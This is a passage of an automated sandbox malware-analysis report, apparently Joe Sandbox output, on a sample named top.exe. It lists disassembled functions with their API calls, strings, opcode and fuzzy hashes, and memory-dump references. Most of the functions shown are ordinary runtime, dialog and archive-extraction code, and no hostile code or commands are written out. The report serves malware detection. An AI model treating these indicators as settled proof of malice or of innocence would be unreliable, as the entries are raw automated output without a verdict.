                                                                  • Instruction ID: 0c55648e1fd035a426445dd7d786f5fe2dee3143a7f4df3872d5d3036eeda1c2
                                                                  • Opcode Fuzzy Hash: 1c5465d2c9dfb1583c91a083879dad4e14ce741a2b73abbff737f73f7dcfbe83
                                                                  • Instruction Fuzzy Hash: 9101213250060167C7117B758C0AA6B7AB99FC0B57F09002AB800B3291EB298D1946AB
                                                                  Function 0046D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00451316: GetDlgItem.USER32(00000000,00003021), ref: 0045135A
                                                                    • Part of subcall function 00451316: SetWindowTextW.USER32(00000000,004835F4), ref: 00451370
                                                                  • EndDialog.USER32(?,00000001), ref: 0046D64B
                                                                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0046D661
                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0046D675
                                                                  • SetDlgItemTextW.USER32(?,00000068), ref: 0046D684
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ItemText$DialogWindow
                                                                  • String ID: RENAMEDLG
                                                                  • API String ID: 445417207-3299779563
                                                                  • Opcode ID: c500c97b66a3f20f2d469a63b338e52fe997a69a96bc507a32a205707326261c
                                                                  • Instruction ID: a46067860aca403f0b3f2a1e1f91d1bf8edea84ffd2fbb6e7048df089371e9d9
                                                                  • Opcode Fuzzy Hash: c500c97b66a3f20f2d469a63b338e52fe997a69a96bc507a32a205707326261c
                                                                  • Instruction Fuzzy Hash: 1C01F933F843107BD2205F69DD09F577B5CAB5A702F110532F605A11D0D6A599058B7F
                                                                  Function 00477E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00477E24,00000000,?,00477DC4,00000000,0048C300,0000000C,00477F1B,00000000,00000002), ref: 00477E93
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00477EA6
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00477E24,00000000,?,00477DC4,00000000,0048C300,0000000C,00477F1B,00000000,00000002), ref: 00477EC9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: 93d9e975007178cdfec8ebb019e98acdf1e443374a19ffda12c1ca6ea01ba15e
                                                                  • Instruction ID: b3be6e1baadaa274a2d5f4ae79f245391cb9a54f1c3ab4b194cf5724c81ebddc
                                                                  • Opcode Fuzzy Hash: 93d9e975007178cdfec8ebb019e98acdf1e443374a19ffda12c1ca6ea01ba15e
                                                                  • Instruction Fuzzy Hash: 09F04931900108BBCB119F91DC09B9EBF74EB44B16F5145AEF80592250DB345E44C758
                                                                  Function 0045F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0046081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00460836
                                                                    • Part of subcall function 0046081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0045F2D8,Crypt32.dll,00000000,0045F35C,?,?,0045F33E,?,?,?), ref: 00460858
                                                                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0045F2E4
                                                                  • GetProcAddress.KERNEL32(004981C8,CryptUnprotectMemory), ref: 0045F2F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                  • API String ID: 2141747552-1753850145
                                                                  • Opcode ID: ebc04aaa932fac62ffa3a8dd7d5c0e2d1bd9d2df1423e900106cc6ce3d86b51d
                                                                  • Instruction ID: 06fea8cf7dedb8a9778110f9358361a5c805f46a3057d5cb860000a1cce210cf
                                                                  • Opcode Fuzzy Hash: ebc04aaa932fac62ffa3a8dd7d5c0e2d1bd9d2df1423e900106cc6ce3d86b51d
                                                                  • Instruction Fuzzy Hash: F5E0DF708007029EC721AF34D849B0A7AD46F04F0AF208C6FF8DA93240D6B8D0848B08
                                                                  Function 00472BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustPointer$_abort
                                                                  • String ID:
                                                                  • API String ID: 2252061734-0
                                                                  • Opcode ID: e2c0285202181cd4929b3128bbad00e8238c8d935321298d0a75da5300e5aa5d
                                                                  • Instruction ID: e01c97d557a4841a7c60e69abc675a3568451f798f8d79228ce73da840bd7fd0
                                                                  • Opcode Fuzzy Hash: e2c0285202181cd4929b3128bbad00e8238c8d935321298d0a75da5300e5aa5d
                                                                  • Instruction Fuzzy Hash: 3C51E172501212EFDB298F15DA45BEB73A4FF10310F24852FE809572A1E7B9ED40D798
                                                                  Function 0047BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0047BF39
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0047BF5C
                                                                    • Part of subcall function 00478E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0047CA2C,00000000,?,00476CBE,?,00000008,?,004791E0,?,?,?), ref: 00478E38
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0047BF82
                                                                  • _free.LIBCMT ref: 0047BF95
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0047BFA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                  • String ID:
                                                                  • API String ID: 336800556-0
                                                                  • Opcode ID: 6502d2f1f209bcc0f455028f5fa7b986d13183921ca02e228d0960e26e16a2bb
                                                                  • Instruction ID: 6ca1044872bff7352cb166a4fed909d2476f90894f4a3152311e9c64524e1203
                                                                  • Opcode Fuzzy Hash: 6502d2f1f209bcc0f455028f5fa7b986d13183921ca02e228d0960e26e16a2bb
                                                                  • Instruction Fuzzy Hash: 5901B1726012117F23211A765C4CEFF6A6DDEC2FA9315852EF90CC2201EF688D0286F8
                                                                  Function 00479869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00491030,00000200,004791AD,0047617E,?,?,?,?,0045D984,?,?,?,00000004,0045D710,?), ref: 0047986E
                                                                  • _free.LIBCMT ref: 004798A3
                                                                  • _free.LIBCMT ref: 004798CA
                                                                  • SetLastError.KERNEL32(00000000,00483A34,00000050,00491030), ref: 004798D7
                                                                  • SetLastError.KERNEL32(00000000,00483A34,00000050,00491030), ref: 004798E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$_free
                                                                  • String ID:
                                                                  • API String ID: 3170660625-0
                                                                  • Opcode ID: a7ba6349bccf49e5e22f338b0c701598df91143d3ba7cb7d1f700f5b09b42936
                                                                  • Instruction ID: e591636e6a52057afeb3e08313fd086c9b356650e11e5a3c1ccbf038d16c31de
                                                                  • Opcode Fuzzy Hash: a7ba6349bccf49e5e22f338b0c701598df91143d3ba7cb7d1f700f5b09b42936
                                                                  • Instruction Fuzzy Hash: B80126321606016BC22237266C85DDF2529DFD3779726853FF40C92291EE2C8C02426F
                                                                  Function 00460EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004611CF: ResetEvent.KERNEL32(?), ref: 004611E1
                                                                    • Part of subcall function 004611CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 004611F5
                                                                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00460F21
                                                                  • CloseHandle.KERNEL32(?,?), ref: 00460F3B
                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 00460F54
                                                                  • CloseHandle.KERNEL32(?), ref: 00460F60
                                                                  • CloseHandle.KERNEL32(?), ref: 00460F6C
                                                                    • Part of subcall function 00460FE4: WaitForSingleObject.KERNEL32(?,000000FF,00461206,?), ref: 00460FEA
                                                                    • Part of subcall function 00460FE4: GetLastError.KERNEL32(?), ref: 00460FF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                  • String ID:
                                                                  • API String ID: 1868215902-0
                                                                  • Opcode ID: 030a297b4cba9b1f232e3492a03830821b13d07e3e64b3cc0ea0154ebbd25be0
                                                                  • Instruction ID: c31f0b6b01b66d78a7b5ff2d1065105aa7ffc82ccf8bb7ae09c095d064773069
                                                                  • Opcode Fuzzy Hash: 030a297b4cba9b1f232e3492a03830821b13d07e3e64b3cc0ea0154ebbd25be0
                                                                  • Instruction Fuzzy Hash: F5015271500744EFC7229F64DD84BCABBA9FB09B11F00092EF16A52164D7B57A44DB98
                                                                  Function 0047C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _free.LIBCMT ref: 0047C817
                                                                    • Part of subcall function 00478DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34), ref: 00478DE2
                                                                    • Part of subcall function 00478DCC: GetLastError.KERNEL32(00483A34,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34,00483A34), ref: 00478DF4
                                                                  • _free.LIBCMT ref: 0047C829
                                                                  • _free.LIBCMT ref: 0047C83B
                                                                  • _free.LIBCMT ref: 0047C84D
                                                                  • _free.LIBCMT ref: 0047C85F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: 4342af63eb0382b2bf6300c9a16bf31d149f227bd70db16f3dd1fb561532c18f
                                                                  • Instruction ID: 206e6526db0a0c96c30577fda371fef6aaf59767be1bc0c2e20fce55720f31a3
                                                                  • Opcode Fuzzy Hash: 4342af63eb0382b2bf6300c9a16bf31d149f227bd70db16f3dd1fb561532c18f
                                                                  • Instruction Fuzzy Hash: C9F0FF32544600AF8620EB6AF5C9C9B73E9AB207257659C2FF10CD7652CB78FC808B5D
                                                                  Function 00461FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00461FE5
                                                                  • _wcslen.LIBCMT ref: 00461FF6
                                                                  • _wcslen.LIBCMT ref: 00462006
                                                                  • _wcslen.LIBCMT ref: 00462014
                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0045B371,?,?,00000000,?,?,?), ref: 0046202F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$CompareString
                                                                  • String ID:
                                                                  • API String ID: 3397213944-0
                                                                  • Opcode ID: 42ee6a65312eda9c739486db3e2f452d859c84b3774345e4c25a41a9fb176d02
                                                                  • Instruction ID: 0ea895898a71a35e80718591db0f258b6e46c158e01696632ae0cacb02bf1716
                                                                  • Opcode Fuzzy Hash: 42ee6a65312eda9c739486db3e2f452d859c84b3774345e4c25a41a9fb176d02
                                                                  • Instruction Fuzzy Hash: 54F09032008014BFCF221F51EC09DCE3F26EB45775B11C41AF61A5B061CB72DAA1E6D9
                                                                  Function 004615FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _swprintf
                                                                  • String ID: %ls$%s: %s
                                                                  • API String ID: 589789837-2259941744
                                                                  • Opcode ID: afca70c29c16e0daff6a351436dc34c468a51f5959c1475cf9d60cda1dc20f55
                                                                  • Instruction ID: 2cc11a9d4b6d4f42404c8e437e32316c4ce081352ba27237a9b77acf34cc1d1d
                                                                  • Opcode Fuzzy Hash: afca70c29c16e0daff6a351436dc34c468a51f5959c1475cf9d60cda1dc20f55
                                                                  • Instruction Fuzzy Hash: 2D513B39288304F7E6252691CD46F367265AB04B09F2C450BF787A50F2F9AFA911671F
                                                                  Function 00477F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\top.exe,00000104), ref: 00477FAE
                                                                  • _free.LIBCMT ref: 00478079
                                                                  • _free.LIBCMT ref: 00478083
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _free$FileModuleName
                                                                  • String ID: C:\Users\user\Desktop\top.exe
                                                                  • API String ID: 2506810119-4088511088
                                                                  • Opcode ID: 6a4e289386b4b96021597be8c27a345ee602d64f9465f314c04bafbd71bdc195
                                                                  • Instruction ID: ed0daaf9c1ae687fc937d1f4072e25811fd11c1ffe52b202b848747225f3a61c
                                                                  • Opcode Fuzzy Hash: 6a4e289386b4b96021597be8c27a345ee602d64f9465f314c04bafbd71bdc195
                                                                  • Instruction Fuzzy Hash: 7531C270A40248AFDB21DF99C988DDEBBBCEB85314F11816FF50897211DA748E44CB59
                                                                  Function 004731D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004731FB
                                                                  • _abort.LIBCMT ref: 00473306
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: EncodePointer_abort
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 948111806-2084237596
                                                                  • Opcode ID: 49721589d6e6d93cb1338a24b834f6e176641c2de5a6bdc819fbd86bb4fe3ca3
                                                                  • Instruction ID: 0462b65eb5b8aafb3cecc4e92a4a873ac744209a2a68f4b08c06e13d73ef33eb
                                                                  • Opcode Fuzzy Hash: 49721589d6e6d93cb1338a24b834f6e176641c2de5a6bdc819fbd86bb4fe3ca3
                                                                  • Instruction Fuzzy Hash: 75414C71900109AFCF15DF94CD85AEEBBB6BF48305F14809AF90867222D3399A50EB59
                                                                  Function 00457401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00457406
                                                                    • Part of subcall function 00453BBA: __EH_prolog.LIBCMT ref: 00453BBF
                                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 004574CD
                                                                    • Part of subcall function 00457A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00457AAB
                                                                    • Part of subcall function 00457A9C: GetLastError.KERNEL32 ref: 00457AF1
                                                                    • Part of subcall function 00457A9C: CloseHandle.KERNEL32(?), ref: 00457B00
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                  • API String ID: 3813983858-639343689
                                                                  • Opcode ID: d9a614f3cf7be3e174a15a8a791d50e341598abdb274f70650f96a7e5d52c514
                                                                  • Instruction ID: 4804d110d1a2b027afed44dd4003b31ca2c7b8a2dbb264903c9ccab31693a23e
                                                                  • Opcode Fuzzy Hash: d9a614f3cf7be3e174a15a8a791d50e341598abdb274f70650f96a7e5d52c514
                                                                  • Instruction Fuzzy Hash: 3931B3719042496ADF11EFA5DC45BEF7BA8AF15309F04403BF805A7293D77C8A48C769
                                                                  Function 0046AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00451316: GetDlgItem.USER32(00000000,00003021), ref: 0045135A
                                                                    • Part of subcall function 00451316: SetWindowTextW.USER32(00000000,004835F4), ref: 00451370
                                                                  • EndDialog.USER32(?,00000001), ref: 0046AD98
                                                                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0046ADAD
                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0046ADC2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ItemText$DialogWindow
                                                                  • String ID: ASKNEXTVOL
